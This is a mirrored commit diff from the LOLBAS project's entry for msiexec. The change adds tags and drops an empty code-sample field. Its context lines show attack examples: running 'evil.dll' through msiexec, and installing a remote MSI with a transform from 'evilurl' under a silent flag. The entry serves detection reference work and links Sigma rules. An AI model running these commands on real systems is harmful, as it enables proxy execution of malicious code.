mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-27 12:42:19 +02:00
* Adding various tags as a first iteration * Adding quotes * Adding 'Custom Format' properly * Updating to key:value pairs * Update template
This commit is contained in:
Wietze
GitHub
@@ -25,6 +25,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.007
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: msiexec /z "C:\folder\evil.dll"
|
||||
Description: Calls DLLUnregisterServer to un-register the target DLL.
|
||||
Usecase: Execute dll files
|
||||
@@ -32,6 +34,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.007
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
|
||||
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input.
|
||||
Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server
|
||||
@@ -42,8 +46,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\msiexec.exe
|
||||
- Path: C:\Windows\SysWOW64\msiexec.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml
|
||||
|
||||
Reference in New Issue
Block a user